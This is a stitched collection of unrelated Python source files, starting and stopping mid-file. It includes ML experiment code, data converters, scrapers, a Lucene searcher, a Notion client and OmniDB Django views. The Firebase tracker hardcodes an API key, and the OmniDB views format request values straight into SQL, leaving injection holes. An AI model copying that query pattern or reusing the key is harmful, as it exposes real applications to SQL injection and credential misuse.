# experiment_results.setdefault("data_names", []).append(exp_instance.names)
# experiment_results.setdefault("target_column", []).append(str(exp_instance.target_column))
# experiment_results.setdefault("accuracy", []).append(exp_instance.accuracy)
for j in exp_result.keys():
experiment_results.setdefault(j,[]).append(exp_result[j])
except ValueError as vale:
# This error arises when the GroupKFold method fails to split the data because the number of distinct groups in
# validation variable is less than the number of splits
print(vale)
# print(exp_instance.validation_method," can't split ", exp_instance.validation_group, " because the number of "
# "splits is more than the number of factors in the grouping variable")
continue
experiments_file.close()
return experiment_results,list_of_experiments
experiment_results,__ = create_and_run_exp(configuration_list)
resultsdf = pd.DataFrame(experiment_results)
# if the results directory does not exist then create it
os.makedirs(os.path.join(project_dir,"results/supervised"), exist_ok=True)
resultsdf.to_pickle(os.path.join(project_dir,"results/supervised",results_prefix+"results")+day_time_string+".pickl")
|
from datetime import datetime
from io import DEFAULT_BUFFER_SIZE
import pandas as pd
import openpyxl
from sqlalchemy import create_engine
sourceFile="Family expenses.xlsm"
outputFile="Family expenses.csv"
outputJSON="Family expenses.json"
book = openpyxl.load_workbook(
sourceFile, data_only=True, read_only=True
)
dfExpense = pd.read_excel(
sourceFile,
sheet_name="Expenses DB",
skiprows=9,
usecols="J,Q:U",
)
dfIncome = pd.read_excel(
sourceFile,
sheet_name="Income DB",
skiprows=9,
usecols="J,Q:U",
)
dfExpense["Amount"] *= -1
dfIncome.rename(columns={"Type ": "Category"}, inplace=True)
dfIncome["Store"] = "NA"
dfIncome["Exclude in WE"] = "NA"
dfResult = dfExpense.append(dfIncome)
dfResult.sort_values(by="Date", inplace=True)
dfResult.rename(columns={"Exclude in WE": "ExcludeWE"}, inplace=True)
dfResult["Date"] = dfResult["Date"].dt.strftime("%Y-%m-%dT00:00:00.000Z")
dfResult["created_at"] = datetime.now().strftime("%Y-%m-%dT00:00:00.000Z")
dfResult["updated_at"] = datetime.now().strftime("%Y-%m-%dT00:00:00.000Z")
cols = [
"Date",
"created_at",
"updated_at",
"Store",
"Category",
"Amount",
"ExcludeWE",
"Description",
]
dfResult = dfResult[cols]
print(dfResult)
dfResult.to_csv(outputFile, index=False)
dfResult.to_json(path_or_buf=outputJSON, orient="records")
engine = create_engine(
"sqlite:////home/ubuntu/repos/go/src/github.com/jsburckhardt/goexpenses/expenses.db",
echo=False,
)
dfResult.to_sql("expenses", con=engine, if_exists="append", index=False)
|
import kronos
from orchestra.communication.staffing import send_staffing_requests
@kronos.register('* * * * *') # run every minute
def send_staffing_requests_periodically():
send_staffing_requests()
|
# numbers = [2,3,1,5]
# min_number = min(numbers)
# max_number = max(numbers)
x = 2
y = 5
min_number = min(x,y)
max_number = max(x,y)
print(min_number)
print(max_number)
|
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""Example showing encryption of a value already in memory using one KMS CMK, then decryption of the ciphertext using
a DiscoveryAwsKmsMasterKeyProvider.
"""
import aws_encryption_sdk
from aws_encryption_sdk import CommitmentPolicy
from aws_encryption_sdk.internal.arn import arn_from_str
from aws_encryption_sdk.key_providers.kms import DiscoveryFilter
def encrypt_decrypt(key_arn, source_plaintext, botocore_session=None):
"""Encrypts a string under one KMS customer master key (CMK), then decrypts it using discovery mode.
:param str key_arn: Amazon Resource Name (ARN) of the KMS CMK
:param bytes source_plaintext: Data to encrypt
:param botocore_session: existing botocore session instance
:type botocore_session: botocore.session.Session
"""
encrypt_kwargs = dict(key_ids=[key_arn])
if botocore_session is not None:
encrypt_kwargs["botocore_session"] = botocore_session
# Set up an encryption client with an explicit commitment policy. Note that if you do not explicitly choose a
# commitment policy, REQUIRE_ENCRYPT_REQUIRE_DECRYPT is used by default.
client = aws_encryption_sdk.EncryptionSDKClient(commitment_policy=CommitmentPolicy.REQUIRE_ENCRYPT_REQUIRE_DECRYPT)
# Create strict master key provider that is only allowed to encrypt and decrypt using the ARN of the provided key.
strict_key_provider = aws_encryption_sdk.StrictAwsKmsMasterKeyProvider(**encrypt_kwargs)
# Encrypt the plaintext using the AWS Encryption SDK. It returns the encrypted message and the header
ciphertext, encrypted_message_header = client.encrypt(source=source_plaintext, key_provider=strict_key_provider)
# Create a second master key provider in discovery mode that does not explicitly list the key used to encrypt.
# Note: The discovery_filter argument is optional; if you omit this, the AWS Encryption SDK attempts to
# decrypt any ciphertext it receives.
arn = arn_from_str(key_arn)
decrypt_kwargs = dict(discovery_filter=DiscoveryFilter(account_ids=[arn.account_id], partition=arn.partition))
if botocore_session is not None:
encrypt_kwargs["botocore_session"] = botocore_session
discovery_key_provider = aws_encryption_sdk.DiscoveryAwsKmsMasterKeyProvider(**decrypt_kwargs)
# Decrypt the encrypted message using the AWS Encryption SDK. It returns the decrypted message and the header.
plaintext, decrypted_message_header = client.decrypt(source=ciphertext, key_provider=discovery_key_provider)
# Verify that the original message and the decrypted message are the same
assert source_plaintext == plaintext
# Verify that the encryption context of the encrypted message and decrypted message match
assert all(
pair in encrypted_message_header.encryption_context.items()
for pair in decrypted_message_header.encryption_context.items()
)
|
import firebase_admin
import requests
from firebase_admin import credentials, firestore
import datetime
import sys
class ScriptTracker:
def __init__(self):
self.starting_time = datetime.datetime.now()
self.email = ''
self.password = ''
self._verify_password_url = 'https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyPassword'
self.api_key = "AIzaSyAclqlFVOFaxoZ9KKVVxSOqPImc9Kp4RjE"
self.script_name = ''
self.total_done = 0
self.total_crashed = 0
self.unique_crash_logs = []
self.uid = ''
self.cred = credentials.Certificate("live-scraping-firebase-adminsdk-gck9g-011e4f00e1.json")
self.firebase = firebase_admin.initialize_app(self.cred)
self.db = firestore.client()
self.users_ref = self.db.collection(u'scrappers')
self.docs = None
self.current_scrappers_data = None
self.status = 'Running'
def set_status_to_completed(self):
self.status = 'Completed'
self.docs = self.users_ref.stream()
for doc in self.docs:
if doc.id == self.uid:
self.current_scrappers_data = doc.to_dict()
self.current_scrappers_data[self.script_name]['status'] = self.status
self.users_ref.document(self.uid).set(self.current_scrappers_data)
def set_status_to_crashed(self):
self.status = 'Crashed'
self.docs = self.users_ref.stream()
for doc in self.docs:
if doc.id == self.uid:
self.current_scrappers_data = doc.to_dict()
self.current_scrappers_data[self.script_name]['status'] = self.status
self.users_ref.document(self.uid).set(self.current_scrappers_data)
def initialize(self, inp_email, inp_password, script_name):
self.email = inp_email
self.password = inp_password
self.script_name = script_name
body = {'email': self.email, 'password': self.password}
params = {'key': self.api_key}
try:
resp = requests.request('post', self._verify_password_url, params=params, json=body)
resp.raise_for_status()
self.uid = resp.json().get('localId')
print('Logged In Successfully !!')
self.docs = self.users_ref.stream()
for doc in self.docs:
if doc.id == self.uid:
self.current_scrappers_data = doc.to_dict()
except Exception as e:
print('Could not Log In, Please make sure that you have created an account on Mobile Application ')
sys.exit()
def send_data(self, total_done, total_crashed, unique_crash_logs):
time_now = datetime.datetime.now()
time_elapsed = time_now - self.starting_time
total_seconds = time_elapsed.total_seconds()
hours = int(divmod(total_seconds, 3600)[0])
minutes = int(divmod(total_seconds, 60)[0])
time_elapsed = str(hours) + ':' + str(minutes)
new_scrapper_data = {
'time_elapsed': time_elapsed,
'records_crashed': total_crashed,
'records_scraped': total_done,
'script_name': self.script_name,
'status': self.status,
'unique_crash_logs': list(set(unique_crash_logs))
}
self.current_scrappers_data[self.script_name] = new_scrapper_data
self.users_ref.document(self.uid).set(self.current_scrappers_data)
|
from gpiozero import Button
from sense_hat import SenseHat
A = Button(16)
B = Button(21)
UP = Button(26)
DOWN = Button(13)
LEFT = Button(20)
RIGHT = Button(19)
sense = SenseHat()
R = [255, 0, 0]
G = [0, 255, 0]
W = [255, 255, 255]
B = [0, 0, 0]
def redCross():
redCross = [
R, W, W, W, W, W, W, R,
W, R, W, W, W, W, R, W,
W, W, R, W, W, R, W, W,
W, W, W, R, R, W, W, W,
W, W, W, R, R, W, W, W,
W, W, R, W, W, R, W, W,
W, R, W, W, W, W, R, W,
R, W, W, W, W, W, W, R
]
sense.set_pixels(redCross)
def greenTick():
greenTick = [
W, W, W, W, W, W, W, G,
W, W, W, W, W, W, W, G,
W, W, W, W, W, W, G, W,
W, W, W, W, W, W, G, W,
W, W, W, W, W, G, W, W,
G, W, W, W, W, G, W, W,
W, G, W, W, G, W, W, W,
W, W, G, G, W, W, W, W
]
sense.set_pixels(greenTick)
def white():
white = [
W, W, W, W, W, W, W, W,
W, W, W, W, W, W, W, W,
W, W, W, W, W, W, W, W,
W, W, W, W, W, W, W, W,
W, W, W, W, W, W, W, W,
W, W, W, W, W, W, W, W,
W, W, W, W, W, W, W, W,
W, W, W, W, W, W, W, W
]
sense.set_pixels(white)
def resetPixels():
black = [
B, B, B, B, B, B, B, B,
B, B, B, B, B, B, B, B,
B, B, B, B, B, B, B, B,
B, B, B, B, B, B, B, B,
B, B, B, B, B, B, B, B,
B, B, B, B, B, B, B, B,
B, B, B, B, B, B, B, B,
B, B, B, B, B, B, B, B,
]
sense.set_pixels(black)
def showText(text):
sense.show_message(str(text))
def getTemperature():
return sense.get_temperature()
def getHuminidty():
return sense.get_humidity()
|
# Generated by Django 2.0.5 on 2019-11-11 15:41
from django.db import migrations
import sorl.thumbnail.fields
class Migration(migrations.Migration):
dependencies = [
('publicaciones', '0008_auto_20191107_0944'),
]
operations = [
migrations.AlterField(
model_name='publicacion',
name='imagen',
field=sorl.thumbnail.fields.ImageField(blank=True, help_text='Tamaรฑo recomendado: 360x390', null=True, upload_to='publicaciones/img/'),
),
]
|
import datetime
import os
import time
import requests
from lxml import etree, html
def get_table(page_html: requests.Response, headers, rows=None, **kwargs):
""" Private function used to return table data inside a list of dictionaries. """
if isinstance(page_html, str):
page_parsed = html.fromstring(page_html)
else:
page_parsed = html.fromstring(page_html.text)
# When we call this method from Portfolio we don't fill the rows argument.
# Conversely, we always fill the rows argument when we call this method from Screener.
# Also, in the portfolio page, we don't need the last row - it's redundant.
if rows is None:
rows = -2 # We'll increment it later (-1) and use it to cut the last row
data_sets = []
# Select the HTML of the rows and append each column text to a list
all_rows = [
column.xpath("td//text()")
for column in page_parsed.cssselect('tr[valign="top"]')
]
# If rows is different from -2, this function is called from Screener
if rows != -2:
for row_number, row_data in enumerate(all_rows, 1):
data_sets.append(dict(zip(headers, row_data)))
if row_number == rows: # If we have reached the required end
break
else:
# Zip each row values to the headers and append them to data_sets
[data_sets.append(dict(zip(headers, row))) for row in all_rows]
return data_sets
def get_total_rows(page_content):
""" Returns the total number of rows(results). """
total_element = page_content.cssselect('td[width="140"]')
total_number = (
etree.tostring(total_element[0]).decode("utf-8").split("</b>")[1].split()[0]
)
try:
return int(total_number)
except ValueError:
return 0
def get_page_urls(page_content, rows, url):
""" Returns a list containing all of the page URL addresses. """
total_pages = int(
[i.text.split("/")[1] for i in page_content.cssselect('option[value="1"]')][0]
)
urls = []
for page_number in range(1, total_pages + 1):
sequence = 1 + (page_number - 1) * 20
if sequence - 20 <= rows < sequence:
break
urls.append(url + f"&r={str(sequence)}")
return urls
def download_chart_image(page_content: requests.Response, **kwargs):
""" Downloads a .png image of a chart into the "charts" folder. """
file_name = f"{kwargs['URL'].split('t=')[1]}_{int(time.time())}.png"
if not os.path.exists("charts"):
os.mkdir("charts")
with open(os.path.join("charts", file_name), "wb") as handle:
handle.write(page_content.content)
def get_analyst_price_targets_for_export(
ticker=None, page_content=None, last_ratings=5
):
analyst_price_targets = []
try:
table = page_content.cssselect('table[class="fullview-ratings-outer"]')[0]
ratings_list = [row.xpath("td//text()") for row in table]
ratings_list = [
[val for val in row if val != "\n"] for row in ratings_list
] # remove new line entries
headers = [
"ticker",
"date",
"category",
"analyst",
"rating",
"price_from",
"price_to",
] # header names
count = 0
for row in ratings_list:
if count == last_ratings:
break
price_from, price_to = (
0,
0,
) # default values for len(row) == 4 , that is there is NO price information
if len(row) == 5:
strings = row[4].split("โ")
if len(strings) == 1:
price_to = (
strings[0].strip(" ").strip("$")
) # if only ONE price is available then it is 'price_to' value
else:
price_from = (
strings[0].strip(" ").strip("$")
) # both '_from' & '_to' prices available
price_to = strings[1].strip(" ").strip("$")
elements = [
ticker,
datetime.datetime.strptime(row[0], "%b-%d-%y").strftime("%Y-%m-%d"),
]
elements.extend(row[1:3])
elements.append(row[3].replace("โ", "->"))
elements.append(price_from)
elements.append(price_to)
data = dict(zip(headers, elements))
analyst_price_targets.append(data)
count += 1
except Exception:
pass
return analyst_price_targets
def download_ticker_details(page_content: requests.Response, **kwargs):
data = {}
ticker = kwargs["URL"].split("=")[1]
page_parsed = html.fromstring(page_content.text)
all_rows = [
row.xpath("td//text()")
for row in page_parsed.cssselect('tr[class="table-dark-row"]')
]
for row in all_rows:
for column in range(0, 11):
if column % 2 == 0:
data[row[column]] = row[column + 1]
if len(data) == 0:
print(f"-> Unable to parse page for ticker: {ticker}")
return {ticker: [data, get_analyst_price_targets_for_export(ticker, page_parsed)]}
|
#!/usr/local/bin/python3
# coding: utf-8
try:
import json, requests, urllib
from geopy.geocoders import Nominatim
from geopy.distance import vincenty
except:
print("Error importing modules, exiting.")
exit()
api_url = "http://opendata.iprpraha.cz/CUR/FSV/FSV_VerejnaWC_b/WGS_84/FSV_VerejnaWC_b.json"
def find(address):
# convert address to latlong
me = locate(address+", Prague")
if me == None:
return None
toilets = getToilets(api_url)
# Get closest toilet
wcID = getClosestID(me, toilets)
wc = toilets[wcID-1]
data = []
try:
address = wc['properties']['ADRESA']
except:
address = "Address not available."
try:
typ = wc['properties']['TYP']
except:
typ = ""
r = "Closest public toilet is {} meters away.\n{}".format(getDist(me, wc), address)
return [r , getCoords(wc)]
def getClosestID(me, toilets):
a = {}
for toilet in toilets:
ID = toilet['properties']['OBJECTID']
a[ID] = getDist(me, toilet)
closest = min(a,key=a.get) # list offset
print("ID {} is {} meters away.".format(closest,a[closest]))
return closest
def getDist( coords, toilet):
loc = toilet['geometry']['coordinates']
loc = (loc[1],loc[0]) # Switch coords position
dist = round(vincenty(coords, loc).meters)
return dist
def getCoords(toilet):
loc = toilet['geometry']['coordinates']
return (loc[1],loc[0])
def locate(address):
geolocator = Nominatim()
location = geolocator.geocode(address)
if location:
coords = (location.latitude, location.longitude)
return coords
return None
def getToilets(url):
# outputs list of dicts
response = requests.get(url)
content = response.content.decode('utf-8')
js = json.loads(content)
return js['features']
# x = find()
# print(x)
|
import cv2
import cv2.aruco as aruco
# ChAruco board variables
CHARUCOBOARD_ROWCOUNT = 4
CHARUCOBOARD_COLCOUNT = 4
# CHARUCO_DICT = aruco.Dictionary_get(aruco.DICT_4X4_50)
# CHARUCO_DICT = aruco.Dictionary_get(aruco.DICT_5X5_50)
CHARUCO_DICT = aruco.Dictionary_get(aruco.DICT_5X5_1000)
# ARUCO_DICT = aruco.Dictionary_get(aruco.DICT_7X7_1000)
# CHARUCO_DICT = aruco.getPredefinedDictionary(aruco.DICT_6X6_1000)
# Create constants to be passed into OpenCV and Aruco methods
# Length of the squares and markers must be in the same units.
CHARUCO_BOARD = aruco.CharucoBoard_create(
squaresX=CHARUCOBOARD_COLCOUNT,
squaresY=CHARUCOBOARD_ROWCOUNT,
# squareLength=0.19134,
# markerLength=0.1424,
# squareLength=0.9,
# markerLength=0.8,
# squareLength=40,
# markerLength=30,
squareLength=90,
markerLength=75,
dictionary=CHARUCO_DICT,
)
CHARUCO_PARAMS = aruco.DetectorParameters_create()
# board = aruco.CharucoBoard_create(5, 7, squareLength, markerLength, aruco_dict)
if __name__ == "__main__":
# print(CHARUCO_BOARD.dictionary)
charuco_board_image = CHARUCO_BOARD.draw((600, 500), marginSize=10, borderBits=1)
charuco_path = f"images/charuco_board_{CHARUCOBOARD_ROWCOUNT}x{CHARUCOBOARD_COLCOUNT}_{aruco.DICT_4X4_50}.png"
cv2.imwrite(
charuco_path,
charuco_board_image,
)
print(f"{charuco_path}, Done!")
|
# -*- coding: utf-8 -*-
'''
Use Lucene to retrieve candidate documents for given a query.
'''
import shutil
import os
import lucene
import parameters as prm
import utils
import itertools
from java.nio.file import Paths
from org.apache.lucene.analysis.standard import StandardAnalyzer
from org.apache.lucene.document import Document, Field, FieldType
from org.apache.lucene.index import FieldInfo, DirectoryReader, IndexWriter, IndexWriterConfig, IndexOptions
from org.apache.lucene.store import SimpleFSDirectory, NIOFSDirectory, MMapDirectory
from org.apache.lucene.util import Version
from org.apache.lucene.search import IndexSearcher, MatchAllDocsQuery, BooleanQuery
from org.apache.lucene.queryparser.classic import QueryParser
import time
from collections import OrderedDict, defaultdict
from multiprocessing.pool import ThreadPool
import Queue
import math
from nltk.tokenize import wordpunct_tokenize
import cPickle as pkl
class LuceneSearch():
def __init__(self):
self.env = lucene.initVM(initialheap='28g', maxheap='28g', vmargs=['-Djava.awt.headless=true'])
self.vocab = None
BooleanQuery.setMaxClauseCount(2048)
if not os.path.exists(prm.index_folder):
print 'Creating index at', prm.index_folder
if prm.docs_path == prm.docs_path_term:
add_terms = True
else:
add_terms = False
self.create_index(prm.index_folder, prm.docs_path, add_terms)
if prm.local_index_folder:
print 'copying index from', prm.index_folder, 'to', prm.local_index_folder
if os.path.exists(prm.local_index_folder):
print 'Folder', prm.local_index_folder, 'already exists! Doing nothing.'
else:
shutil.copytree(prm.index_folder, prm.local_index_folder)
self.index_folder = prm.local_index_folder
else:
self.index_folder = prm.index_folder
fsDir = MMapDirectory(Paths.get(prm.index_folder))
self.searcher = IndexSearcher(DirectoryReader.open(fsDir))
if prm.docs_path != prm.docs_path_term:
if not os.path.exists(prm.index_folder_term):
print 'Creating index at', prm.index_folder_term
self.create_index(prm.index_folder_term, prm.docs_path_term, add_terms=True)
if prm.local_index_folder_term:
print 'copying index from', prm.index_folder_term, 'to', prm.local_index_folder_term
if os.path.exists(prm.local_index_folder_term):
print 'Folder', prm.local_index_folder_term, 'already exists! Doing nothing.'
else:
shutil.copytree(prm.index_folder_term, prm.local_index_folder_term)
self.index_folder_term = prm.local_index_folder_term
else:
self.index_folder_term = prm.index_folder_term
fsDir_term = MMapDirectory(Paths.get(prm.index_folder_term))
self.searcher_term = IndexSearcher(DirectoryReader.open(fsDir_term))
self.analyzer = StandardAnalyzer()
self.pool = ThreadPool(processes=prm.n_threads)
self.cache = {}
print 'Loading Title-ID mapping...'
self.title_id_map, self.id_title_map = self.get_title_id_map()
def get_title_id_map(self):
# get number of docs
n_docs = self.searcher.getIndexReader().numDocs()
title_id = {}
id_title = {}
query = MatchAllDocsQuery()
hits = self.searcher.search(query, n_docs)
for hit in hits.scoreDocs:
doc = self.searcher.doc(hit.doc)
idd = int(doc['id'])
title = doc['title']
title_id[title] = idd
id_title[idd] = title
return title_id, id_title
def add_doc(self, doc_id, title, txt, add_terms):
doc = Document()
txt = utils.clean(txt)
if add_terms:
txt_ = txt.lower()
words_idx, words = utils.text2idx2([txt_], self.vocab, prm.max_terms_per_doc)
words_idx = words_idx[0]
words = words[0]
doc.add(Field("id", str(doc_id), self.t1))
doc.add(Field("title", title, self.t1))
doc.add(Field("text", txt, self.t2))
if add_terms:
doc.add(Field("word_idx", ' '.join(map(str,words_idx)), self.t3))
doc.add(Field("word", '<&>'.join(words), self.t3))
self.writer.addDocument(doc)
def create_index(self, index_folder, docs_path, add_terms=False):
print 'Loading Vocab...'
if not self.vocab:
self.vocab = utils.load_vocab(prm.vocab_path, prm.n_words)
os.mkdir(index_folder)
self.t1 = FieldType()
self.t1.setStored(True)
self.t1.setIndexOptions(IndexOptions.DOCS)
self.t2 = FieldType()
self.t2.setStored(False)
self.t2.setIndexOptions(IndexOptions.DOCS_AND_FREQS)
self.t3 = FieldType()
self.t3.setStored(True)
self.t3.setIndexOptions(IndexOptions.NONE)
fsDir = MMapDirectory(Paths.get(index_folder))
writerConfig = IndexWriterConfig(StandardAnalyzer())
self.writer = IndexWriter(fsDir, writerConfig)
print "%d docs in index" % self.writer.numDocs()
print "Indexing documents..."
doc_id = 0
import corpus_hdf5
corpus = corpus_hdf5.CorpusHDF5(docs_path)
for txt in corpus.get_text_iter():
title = corpus.get_article_title(doc_id)
self.add_doc(doc_id, title, txt, add_terms)
if doc_id % 1000 == 0:
print 'indexing doc', doc_id
doc_id += 1
print "Index of %d docs..." % self.writer.numDocs()
self.writer.close()
def search_multithread(self, qs, max_cand, max_full_cand, searcher):
self.max_cand = max_cand
self.max_full_cand = max_full_cand
self.curr_searcher = searcher
out = self.pool.map(self.search_multithread_part, qs)
return out
def search_multithread_part(self, q):
if not self.env.isCurrentThreadAttached():
self.env.attachCurrentThread()
if q in self.cache:
return self.cache[q]
else:
try:
q = q.replace('AND','\\AND').replace('OR','\\OR').replace('NOT','\\NOT')
query = QueryParser("text", self.analyzer).parse(QueryParser.escape(q))
except:
print 'Unexpected error when processing query:', str(q)
print 'Using query "dummy".'
q = 'dummy'
query = QueryParser("text", self.analyzer).parse(QueryParser.escape(q))
c = OrderedDict()
hits = self.curr_searcher.search(query, self.max_cand)
for i, hit in enumerate(hits.scoreDocs):
doc = self.curr_searcher.doc(hit.doc)
if i < self.max_full_cand:
word_idx = map(int, doc['word_idx'].split(' '))
word = doc['word'].split('<&>')
else:
word_idx = []
word = []
c[int(doc['id'])] = [word_idx, word]
return c
def search_singlethread(self, qs, max_cand, max_full_cand, curr_searcher):
out = []
for q in qs:
if q in self.cache:
out.append(self.cache[q])
else:
try:
q = q.replace('AND','\\AND').replace('OR','\\OR').replace('NOT','\\NOT')
query = QueryParser("text", self.analyzer).parse(QueryParser.escape(q))
except:
print 'Unexpected error when processing query:', str(q)
print 'Using query "dummy".'
query = QueryParser("text", self.analyzer).parse(QueryParser.escape('dummy'))
c = OrderedDict()
hits = curr_searcher.search(query, max_cand)
for i, hit in enumerate(hits.scoreDocs):
doc = curr_searcher.doc(hit.doc)
if i < max_full_cand:
word_idx = map(int, doc['word_idx'].split(' '))
word = doc['word'].split('<&>')
else:
word_idx = []
word = []
c[int(doc['id'])] = [word_idx, word]
out.append(c)
return out
def get_candidates(self, qs, max_cand, max_full_cand=None, save_cache=False, extra_terms=True):
if not max_full_cand:
max_full_cand = max_cand
if prm.docs_path != prm.docs_path_term:
max_cand2 = 0
else:
max_cand2 = max_full_cand
if prm.n_threads > 1:
out = self.search_multithread(qs, max_cand, max_cand2, self.searcher)
if (prm.docs_path != prm.docs_path_term) and extra_terms:
terms = self.search_multithread(qs, max_full_cand, max_full_cand, self.searcher_term)
else:
out = self.search_singlethread(qs, max_cand, max_cand2, self.searcher)
if (prm.docs_path != prm.docs_path_term) and extra_terms:
terms = self.search_singlethread(qs, max_full_cand, max_full_cand, self.searcher_term)
if (prm.docs_path != prm.docs_path_term) and extra_terms:
for outt, termss in itertools.izip(out, terms):
for cand_id, term in itertools.izip(outt.keys()[:max_full_cand], termss.values()):
outt[cand_id] = term
if save_cache:
for q, c in itertools.izip(qs, out):
if q not in self.cache:
self.cache[q] = c
return out
|
import KratosMultiphysics as KM
if not KM.IsDistributedRun():
raise Exception("This test script can only be executed in MPI!")
from KratosMultiphysics.CoSimulationApplication import * # registering tests
def run():
KM.Tester.SetVerbosity(KM.Tester.Verbosity.PROGRESS) # TESTS_OUTPUTS
KM.Tester.RunTestSuite("KratosCosimulationMPIFastSuite")
if __name__ == '__main__':
run()
|
import requests
from Notion.page import Page
from Notion.blocks import Block
from Notion.richtext import RichText
class Notion:
key = None
api_version = '2021-08-16'
def __init__(self, key):
Notion.key = key
def get_basic_headers(self):
return {
'Notion-Version': Notion.api_version,
'Authorization': 'Bearer ' + Notion.key
}
def req_get(self, url, params = {}, headers = {}):
headers.update(self.get_basic_headers())
response = requests.get(url, json = params, headers = headers)
return response.json()
def req_post(self, url, params = {}, headers = {}):
headers.update(self.get_basic_headers())
response = requests.post(url, json = params, headers = headers)
return response.json()
def req_put(self, url, params = {}, headers = {}):
headers.update(self.get_basic_headers())
response = requests.put(url, json = params, headers = headers)
return response.json()
def req_delete(self, url, params = {}, headers = {}):
headers.update(self.get_basic_headers())
response = requests.delete(url, json = params, headers = headers)
return response.json()
def req_patch(self, url, params = {}, headers = {}):
headers.update(self.get_basic_headers())
response = requests.patch(url, json = params, headers = headers)
return response.json()
def get_page(self, page_id, lazy = False):
page = Page(page_id, lazy = lazy, notion_obj = self)
return page
def db_query(self, db_id, filter = {}, sorts = []):
data = {}
if len(filter) != 0:
data['filter'] = filter
if len(sorts) != 0:
data['sorts']
response = self.req_post(f'https://api.notion.com/v1/databases/{db_id}/query', data)
result = []
for page in response['results']:
result.append(Page(data = page, notion_obj = self))
return result
def create_rich_text(self, text):
return RichText(text)
def create_paragraph(self, rt = None):
b = Block()
b.type = 'paragraph'
if rt is not None:
if isinstance(rt, list):
b.rich_text_objects += rt
else:
b.append_richtext(rt)
return b
|
# String Manipulation and Code Intelligence
print(" String Manipulation")
print('''
------------------------------------------------------------------------------------------
We can combine two string in print statement using '+' e.g. print("Hello"+"World")
Doing this the word Hello World is printed as HelloWorld no spaces are there in between but we can make it happer
1st approach :
------- >>> print("Hello "+"World")
- The first approach is to add a space after Hello within the quotation to make it in considerations
2nd approach :
------- >>> print("Hello"+"World ")
- The second approach is to add a space after World within the quotation to make it in considerations
3rd approach :
------- >>> print("Hello" + " " + "World ")
- The third approach is to add a blank space within quotes around with + to combine three different Strings in one place to make it in considerations.
- In this case the whole thing is focused in the addon as the separter in nothing but a blank space added within a quotes.
SomeThing to Ponder:
- Print statement not only print strings it can print any value stored in the variable for that :
we just have to place that variable name in the brackets without quotation!
cooool man !
Code Intelligence ๐ป
Code Intelligence is used to auto complete the code , all text-editor have one of these
- It makes Coding quite easy and Joyful !
- Its also indicate some error before running the code ( Awesome !)
-Its indicate by some red lines below the coded code .
''')
|
from django.http import HttpResponse
from django.template import loader
from django.http import JsonResponse
from django.core import serializers
import json
import sys
import OmniDB_app.include.Spartacus as Spartacus
import OmniDB_app.include.Spartacus.Database as Database
import OmniDB_app.include.Spartacus.Utils as Utils
from OmniDB_app.include.Session import Session
def get_node_children(request):
v_return = {}
v_return['v_data'] = ''
v_return['v_error'] = False
v_return['v_error_id'] = -1
#Invalid session
if not request.session.get('omnidb_session'):
v_return['v_error'] = True
v_return['v_error_id'] = 1
return JsonResponse(v_return)
v_session = request.session.get('omnidb_session')
json_object = json.loads(request.POST.get('data', None))
v_sn_id_parent = json_object['p_sn_id_parent']
if not v_sn_id_parent:
v_filter = ' is null'
else:
v_filter = ' = {0}'.format(v_sn_id_parent)
v_return['v_data'] = {
'v_list_nodes': [],
'v_list_texts': []
}
try:
#Child nodes
v_child_nodes = v_session.v_omnidb_database.v_connection.Query('''
select sn_id, sn_name
from snippets_nodes
where user_id = {0}
and sn_id_parent {1}
'''.format(v_session.v_user_id,v_filter))
for v_node in v_child_nodes.Rows:
v_node_data = {
'v_id': v_node['sn_id'],
'v_name': v_node['sn_name']
}
v_return['v_data']['v_list_nodes'].append(v_node_data)
#Child texts
v_child_texts = v_session.v_omnidb_database.v_connection.Query('''
select st_id, st_name
from snippets_texts
where user_id = {0}
and sn_id_parent {1}
'''.format(v_session.v_user_id,v_filter))
for v_text in v_child_texts.Rows:
v_text_data = {
'v_id': v_text['st_id'],
'v_name': v_text['st_name']
}
v_return['v_data']['v_list_texts'].append(v_text_data)
except Exception as exc:
v_return['v_data'] = str(exc)
v_return['v_error'] = True
return JsonResponse(v_return)
return JsonResponse(v_return)
def get_snippet_text(request):
v_return = {}
v_return['v_data'] = ''
v_return['v_error'] = False
v_return['v_error_id'] = -1
#Invalid session
if not request.session.get('omnidb_session'):
v_return['v_error'] = True
v_return['v_error_id'] = 1
return JsonResponse(v_return)
v_session = request.session.get('omnidb_session')
json_object = json.loads(request.POST.get('data', None))
v_st_id = json_object['p_st_id']
try:
v_return['v_data'] = v_session.v_omnidb_database.v_connection.ExecuteScalar('''
select st_text
from snippets_texts
where st_id = {0}
'''.format(v_st_id))
except Exception as exc:
v_return['v_data'] = str(exc)
v_return['v_error'] = True
return JsonResponse(v_return)
return JsonResponse(v_return)
def new_node_snippet(request):
v_return = {}
v_return['v_data'] = ''
v_return['v_error'] = False
v_return['v_error_id'] = -1
#Invalid session
if not request.session.get('omnidb_session'):
v_return['v_error'] = True
v_return['v_error_id'] = 1
return JsonResponse(v_return)
v_session = request.session.get('omnidb_session')
json_object = json.loads(request.POST.get('data', None))
v_sn_id_parent = json_object['p_sn_id_parent']
v_mode = json_object['p_mode']
v_name = json_object['p_name']
if not v_sn_id_parent:
v_sn_id_parent = 'null'
try:
if v_mode == 'node':
v_session.v_omnidb_database.v_connection.Execute('''
insert into snippets_nodes values (
(select coalesce(max(sn_id), 0) + 1 from snippets_nodes),'{0}',{1},'','',{2})
'''.format(v_name,v_session.v_user_id,v_sn_id_parent))
else:
v_session.v_omnidb_database.v_connection.Execute('''
insert into snippets_texts values (
(select coalesce(max(st_id), 0) + 1 from snippets_texts),'{0}','','','',{1},{2})
'''.format(v_name,v_sn_id_parent,v_session.v_user_id))
except Exception as exc:
v_return['v_data'] = str(exc)
v_return['v_error'] = True
return JsonResponse(v_return)
v_return['v_data'] = ''
return JsonResponse(v_return)
def delete_node_snippet(request):
v_return = {}
v_return['v_data'] = ''
v_return['v_error'] = False
v_return['v_error_id'] = -1
#Invalid session
if not request.session.get('omnidb_session'):
v_return['v_error'] = True
v_return['v_error_id'] = 1
return JsonResponse(v_return)
v_session = request.session.get('omnidb_session')
json_object = json.loads(request.POST.get('data', None))
v_id = json_object['p_id']
v_mode = json_object['p_mode']
try:
